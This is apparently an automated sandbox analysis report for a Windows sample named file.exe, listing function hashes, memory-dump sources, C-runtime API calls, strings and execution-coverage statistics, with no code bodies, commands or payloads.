                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 19bff8c262b12250fe17863f62ae0da341e7993db07a4f109174e30836c9ca6d
                                                                                                                                                                              • Instruction ID: dd1d2d29dc63350bb0ca83122191ce6ff456342f032e38de314f59283327b65b
                                                                                                                                                                              • Opcode Fuzzy Hash: 19bff8c262b12250fe17863f62ae0da341e7993db07a4f109174e30836c9ca6d
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B81DE75A242098FCB09CEFCD9847EEBBF2BB8A350F50881ED405E7744D6399D498B52
Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              • Instruction ID: f701e2bb4b47a197c3ead5e7a47b207751fab7070674edfe6a237668486103a2
                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb4866b1b8532783687a37f6612872906d4c106b67f96ac39c301f588a22aa9
                                                                                                                                                                              • Instruction Fuzzy Hash: A3510672E541068FDB09CEBCC5D13EE7BF1AB46321F10D919D911EBB50C23A9A49CB92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: b3cb5aab7720d4c3140aa32d994697df36b3a730023baaad97257d61ae2eb468
                                                                                                                                                                              • Instruction ID: f78007999514f580ad6e373692633a9be633d3a6f10948d4485659a18e656c90
                                                                                                                                                                              • Opcode Fuzzy Hash: b3cb5aab7720d4c3140aa32d994697df36b3a730023baaad97257d61ae2eb468
                                                                                                                                                                              • Instruction Fuzzy Hash: 7751B072A542568FCB09CEFCC9953FE7BB1BB46310F10C91DD412D7784D6298A498792
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c89844b37421d08347d19d08b8332118becdfa9e47572e0395efcd425b97edb5
                                                                                                                                                                              • Instruction ID: bf358dcc17627888b7380c6ccbb5722cfbbe6382d0900956bf909bf9a14ec944
                                                                                                                                                                              • Opcode Fuzzy Hash: c89844b37421d08347d19d08b8332118becdfa9e47572e0395efcd425b97edb5
                                                                                                                                                                              • Instruction Fuzzy Hash: 09513075A502068FCF09CEBCC5953FE77F2AB42324F10D919D425D7B64C62A8B098B52
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: 0a2a989656ed4afe3d8426f59127208e649e67c1b57c17307773b4dd863a5987
                                                                                                                                                                              • Instruction ID: 9290cdd1cef3d1c370bc8d1d5f9338b060ef2750e0b839ec2e1014e970a00dc8
                                                                                                                                                                              • Opcode Fuzzy Hash: 0a2a989656ed4afe3d8426f59127208e649e67c1b57c17307773b4dd863a5987
                                                                                                                                                                              • Instruction Fuzzy Hash: 0351E436E541068FCB09DEFCC6D13EE7BF2AF42355F10C819D415EBB51C62A9A098B86
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: cbb3c539e91ba1ee62b0781047ae0108920de02bdbbe64ab5ff9ea80da172911
                                                                                                                                                                              • Instruction ID: 57f6eac1488715b3de8fc5565f1e45eadc2aad7e3f75aca96d7ea5abf8cff533
                                                                                                                                                                              • Opcode Fuzzy Hash: cbb3c539e91ba1ee62b0781047ae0108920de02bdbbe64ab5ff9ea80da172911
                                                                                                                                                                              • Instruction Fuzzy Hash: D041D375E502068FCF0DCEACC8957EF7BF1AB46320F10861DD821ABB90C23A4509CB92
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: c34d7dd1e7a5170e144a6a9fe4ce8984384ee10ee6007a8cfcae9247f0176890
                                                                                                                                                                              • Instruction ID: d3d8715d58c4a57fc2839e4e341f02a64dd1b24588b18a9f13240186bf4f6245
                                                                                                                                                                              • Opcode Fuzzy Hash: c34d7dd1e7a5170e144a6a9fe4ce8984384ee10ee6007a8cfcae9247f0176890
                                                                                                                                                                              • Instruction Fuzzy Hash: 1F414772E415068FDF18DEECC4953EF3BF1AB52320F10AC2DD4219B795D62A850A8B82
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              • Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID:
                                                                                                                                                                              • Opcode ID: e55276ed864785f39a79e6dfbe191bdeb763cca80d9e93c123a3ae636ad1ca59
                                                                                                                                                                              • Instruction ID: 224e225b8e4238a9fc9ef2d23a353fdeaa24985961e672848701c5efd4a7a444
                                                                                                                                                                              • Opcode Fuzzy Hash: e55276ed864785f39a79e6dfbe191bdeb763cca80d9e93c123a3ae636ad1ca59
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B413B769905124FCF0CCABCC5957EF7BF2AB5A325F10D51CC421AB791C22B690ACB42

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              APIs
                                                                                                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 6D5D0D99
                                                                                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6D5D0EA7
                                                                                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6D5D0FF9
                                                                                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6D5D1014
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                              • String ID: csm$csm$csm
                                                                                                                                                                              • API String ID: 2751267872-393685449

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,6D5D4EC7,00000022,FlsSetValue,6D5DD390,6D5DD398,00000000,?,6D5D3140,FFFFFFFF,000000FF,?,6D5D2848,00000000,00000000), ref: 6D5D4D00
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID: H(]m$api-ms-$ext-ms-
                                                                                                                                                                              • API String ID: 3664257935-3134889710

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetLastError.KERNEL32(00000001,?,6D5CFF01,6D5CD7D8,6D5CD19F,?,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8,0000000C,6D5CD4D0), ref: 6D5D02DA
                                                                                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D5D02E8
                                                                                                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D5D0301
                                                                                                                                                                              • SetLastError.KERNEL32(00000000,6D5CD3D7,?,00000001,?,?,00000001,?,6D5E0DC8,0000000C,6D5CD4D0,?,00000001,?), ref: 6D5D0353
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3852720340-0

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Desktop\file.exe, xrefs: 6D5D3E8F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID:
                                                                                                                                                                              • String ID: C:\Users\user\Desktop\file.exe
                                                                                                                                                                              • API String ID: 0-1639720508

                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                              • Executed
                                                                                                                                                                              • Not Executed
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,6E8FD2E3,00000000,?,00000000,6D5DA5C2,000000FF,?,6D5D2110,?,?,6D5D20E4,?), ref: 6D5D21AB
                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D5D21BD
                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,?,00000000,6D5DA5C2,000000FF,?,6D5D2110,?,?,6D5D20E4,?), ref: 6D5D21DF
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                              • API String ID: 4061214504-1276376045
                                                                                                                                                                              APIs
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 6D5D6A79
                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 6D5D6B42
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BA9
                                                                                                                                                                                • Part of subcall function 6D5D33E2: HeapAlloc.KERNEL32(00000000,6D5D43EC,?,?,6D5D43EC,00000220,?,00000000,?), ref: 6D5D3414
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BBC
                                                                                                                                                                              • __freea.LIBCMT ref: 6D5D6BC9
                                                                                                                                                                              Memory Dump Source
• Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
• Associated: 00000000.00000002.1439113521.000000006D5B0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439213035.000000006D5DB000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D5E2000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439234839.000000006D642000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.1439421099.000000006D644000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6d5b0000_file.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1096550386-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6D5D0853,00000000,?,00000001,?,?,?,6D5D0942,00000001,FlsFree,6D5DC5C8,FlsFree), ref: 6D5D08AF
                                                                                                                                                                              • GetLastError.KERNEL32(?,6D5D0853,00000000,?,00000001,?,?,?,6D5D0942,00000001,FlsFree,6D5DC5C8,FlsFree,00000000,?,6D5D03A1), ref: 6D5D08B9
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6D5D08E1
                                                                                                                                                                              Strings
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                              • String ID: api-ms-
                                                                                                                                                                              • API String ID: 3177248105-2084034818
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetConsoleOutputCP.KERNEL32(6E8FD2E3,00000000,00000000,?), ref: 6D5D7164
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6D5D73B6
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D5D73FC
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6D5D749F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2112829910-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AdjustPointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1740715915-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6D5D36F1
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6D5D36F8
                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?), ref: 6D5D3732
                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6D5D3739
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1913693674-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32 ref: 6D5D4AEC
                                                                                                                                                                                • Part of subcall function 6D5D4A41: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6D5D6B9F,?,00000000,-00000008), ref: 6D5D4AA2
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D5D4B24
                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D5D4B44
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 158306478-0
                                                                                                                                                                              • Opcode ID: 18250cf37f5b4789cc18fb335c190b6aab46424dcb370da82aa73d2188bdd21b
                                                                                                                                                                              • Instruction ID: e1df4f00ce070fe66d147a09b315670e16ad1b88ac7e9f99465c7a79149b995b
                                                                                                                                                                              • Opcode Fuzzy Hash: 18250cf37f5b4789cc18fb335c190b6aab46424dcb370da82aa73d2188bdd21b
                                                                                                                                                                              • Instruction Fuzzy Hash: 1011E1B15092157FBF8A27BD4C8CD6F7A7DDEAA2A87020524F50592900EB34CD0181BD
                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000), ref: 6D5D881D
                                                                                                                                                                              • GetLastError.KERNEL32(?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?,?,?,6D5D7A96,00000000), ref: 6D5D8829
                                                                                                                                                                                • Part of subcall function 6D5D87EF: CloseHandle.KERNEL32(FFFFFFFE,6D5D8839,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?,?), ref: 6D5D87FF
                                                                                                                                                                              • ___initconout.LIBCMT ref: 6D5D8839
                                                                                                                                                                                • Part of subcall function 6D5D87B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D5D87E0,6D5D7FB2,?,?,6D5D74F3,?,00000000,00000000,?), ref: 6D5D87C4
                                                                                                                                                                              • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6D5D7FC5,00000000,00000001,00000000,?,?,6D5D74F3,?,00000000,00000000,?), ref: 6D5D884E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.1439142596.000000006D5B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D5B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2744216297-0
                                                                                                                                                                              • Opcode ID: 68f403d659f8e60884bbf5e8e37abb878edc54ebc5790ad9e21a0626e4022d59
                                                                                                                                                                              • Instruction ID: 546a75c548e7e9906f929bcf500cb6efb26ad786c39322b77beb860ea71070f0
                                                                                                                                                                              • Opcode Fuzzy Hash: 68f403d659f8e60884bbf5e8e37abb878edc54ebc5790ad9e21a0626e4022d59
                                                                                                                                                                              • Instruction Fuzzy Hash: C8F03036000129BBCF662F96CC04A9D3F77FB497A1B154854FE2995920DB328D60EBA9
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6D5CFD5F
                                                                                                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6D5CFE13
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                              • String ID: csm
                                                                                                                                                                              • API String ID: 3480331319-1018135373
                                                                                                                                                                              • Opcode ID: 03b504218a3af59a4a14ac5ba547f30ff16c82d12e32624a437b809729dbe39a
                                                                                                                                                                              • Instruction ID: 9138cc68f969894dbae0496ed4900b5017bc4fcab1e7dc7f26f764d2806e8168
                                                                                                                                                                              • Opcode Fuzzy Hash: 03b504218a3af59a4a14ac5ba547f30ff16c82d12e32624a437b809729dbe39a
                                                                                                                                                                              • Instruction Fuzzy Hash: 6D410634A0520AAFCF08CFACC884BAE7BF1BF45318F10845AE9149B755D731DA05CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • EncodePointer.KERNEL32(00000000,?), ref: 6D5D1044
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: EncodePointer
                                                                                                                                                                              • String ID: MOC$RCC
                                                                                                                                                                              • API String ID: 2118026453-2084237596
                                                                                                                                                                              • Opcode ID: 88a18868f7f3fc357dcce997a95f1cacfec465940c0c53d635fbd863feb9b111
                                                                                                                                                                              • Instruction ID: 62ae29dbee7b291dbc84ac20e893046dbf7bd0790cc1319f6104bfa85a924bf7
                                                                                                                                                                              • Opcode Fuzzy Hash: 88a18868f7f3fc357dcce997a95f1cacfec465940c0c53d635fbd863feb9b111
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B41AB3190020AAFCF4ADF98CC80EEEBBB5FF88304F158559FA15A7614D335A950DB65

                                                                                                                                                                              Execution Graph

                                                                                                                                                                              Execution Coverage:4.7%
                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                              Signature Coverage:3.4%
                                                                                                                                                                              Total number of Nodes:2000
                                                                                                                                                                              Total number of Limit Nodes:29
